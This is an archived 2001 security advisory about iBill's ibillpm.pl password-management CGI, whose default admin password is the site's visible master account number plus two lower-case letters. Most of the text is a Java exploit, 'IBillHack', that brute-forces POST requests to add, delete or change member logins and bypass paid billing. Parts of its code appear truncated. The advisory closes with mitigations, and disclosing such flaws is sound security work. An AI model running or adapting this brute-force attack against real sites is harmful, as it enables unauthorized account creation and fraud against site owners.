TUCoPS :: Web :: Specific Sites :: web4828.htm

iBill - ibillpm.pl
26th Oct 2001 [SBWID-4828]



	Websites that use iBill\'s Password Management CGI  script,  ibillpm.pl,
	using default setup process performed by iBill.


	MK Ultra found following, allowing an attacker  to  bypass  the  billing
	system  and  add  an  arbitrary  username/password   to   a   website\'s
	\"member\" section. Thousands are estimated to use the default setup.


	iBill hard codes  a  weak  password  for  the  user  management  script,
	ibillpm.pl, installed for  clients  that  use  the  Password  Management
	system. The weak password is the client\'s MASTER_ACCOUNT (which can  be
	viewed in the HTML of the site\'s signup  pages)  plus  only  2  letters
	that are lower-case (aa - zz). This allows a brute force POST to  easily
	add/delete/chgpwd of users in the  .htpasswd  file.  The  CGI  keeps  no
	auditing record of what changes it makes, nor  does  the  web  log  file
	indicate what username was  added  to  the  system  (doesn\'t  log  POST
	data). In addition, the requests in the  web  log  file  all  have  HTTP
	response  code  200,  which  usually  doesn\'t  indicate   problems   in

	 Exloit :




	// 10/25/2001


	import java.net.*;

	import java.io.*;



	* IBillHack class for informational purposes only.

	* This program brute-forces POST requests to the iBill Password Management CGI

	* and allows us to add/delete usernames and change passwords on websites 

	* that used iBill Password Management using default installation.

	* By default iBill sets up the $authpwd as MASTER_ACCOUNTxx, where \"xx\" 

	* is a pair of letters [a-z]. It is suggested that all clients of iBill 

	* that use Password Management aquire a new $authpwd for their ibillpm.pl 

	* script.

	* MASTER_ACCOUNT can be found as part of the <FORM> tag on the signup pages:

	* <input type=\"hidden\" name=\"account\" value=\"123456-500\">

	* OR

	* <input type=\"hidden\" name=\"account\" value=\"123456500\">

	* The last 3 digits is the sub-account, and somtimes there is a dash, 

	* sometimes not. In this case MASTER_ACCOUNT=123456.


	* /cgi-bin/ibillpm.pl is the default path to the CGI. Sometimes the webmaster 

	* is smart enough not to use the default and request that $authpwd be changed

	* to something more secure. In addition to these measures, a webmaster can 

	* also modify their httpd.conf to only allow iBill IP addresses to request 

	* the Password Management CGI script.


	* The correct $authpwd is not saved here. That is an optional exercise for 

	* the reader. 


	* Here are the return codes from the ibillpm.pl script (not HTTP status codes) 

	* and their meaning:


	* 501 - authentication failed

	* 502 - invalid request type (command must be add, delete, or chgpwd)

	* 503 - failed to locate the password file

	* 504 - failed to open the password file

	* 505 - specified user already exists

	* 506 - specified user doesn\'t exist

	* 507 - invalid username

	* 508 - invalid password


	* 201 - add user success

	* 202 - delete user success

	* 203 - change password success




	public class IBillHack {


	    public static void main(String args[]) {

	        if (args.length != 6) {

	            System.err.println(\"Usage: java IBillHack <target_hostname> </path/to/cgi-bin/ibillpm.pl> \" + 

	                        \"<add|delete|chgpwd> <username> <password> <master_account>\");

	            System.err.println(\"Example: java IBillHack www.somesite.com /cgi-bin/ibillpm.pl add bob 1pass 123456\");




	        char letters[] = {

	            \'a\', \'b\', \'c\', \'d\', \'e\', \'f\', \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', 

	            \'n\', \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\', \'w\', \'x\', \'y\', \'z\'



	        for (int i = 0; i < letters.length; i++) {

	            for (int j = 0; j < letters.length; j++) {

	                try {

	                    Socket s = new Socket(InetAddress.getByName(args[0]), 80);

	                    StringBuffer headers = new StringBuffer();


	                    headers.append(\"POST \" + args[1] + \" HTTP/1.1\\n\");

	                    headers.append(\"Referer: http://\"; + args[0] + args[1] 

	                                   + \"\\n\");

	                    headers.append(\"Content-Type: application/x-www-form-urlencoded\\n\");

	                    headers.append(\"User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\\n\");

	                    headers.append(\"Host: \" + args[0] + \"\\n\");


	                    StringBuffer query = new StringBuffer();


	                    query.append(\"\\nauthpwd=\" + args[5] + letters[i] 

	                                 + letters[j] + \"&reqtype=\" + args[2] 

	                                 + \"&username=\" + args[3] + \"&password=\" 

	                                 + args[4] + \"&submit=Submit\\n\");


	                    String q = query.toString();


	                    headers.append(\"Content-Length: \" + q.length() + \"\\n\");


	                    OutputStream os = 

	                        new BufferedOutputStream(s.getOutputStream());













	                } catch (Exception e) {







			System.err.println(\"Finished trying all aa-zz combinations for MASTER_ACCOUNT \" + args[5]);

			System.err.println(\"Try logging into the members section of \" + args[0] + \" with username/password \" + args[3] + \"/\" + args[4]);








	Non-vulnerable Applications: Websites that do not use iBill\'s  Password
	Managment system, or use more secure settings other than default.

	Non-vulnerable OS:  WindowsNT/2000  or  other  systems  not  capable  of
	running ibillpm.pl Perl CGI.


	1) Move the script to a less obvious place than  the  default  so  it\'s
	harder to find (don\'t forget to change the  path  at  the  iBill  admin

	2) Request that iBill set a more  secure  password  for  the  ibillpm.pl

	3) Change your webserver config (httpd.conf for Apache)  to  only  allow
	addresses from .ibill.com to access the path  to  ibillpm.pl.  See  your
	webserver documentation for details on how to do this.

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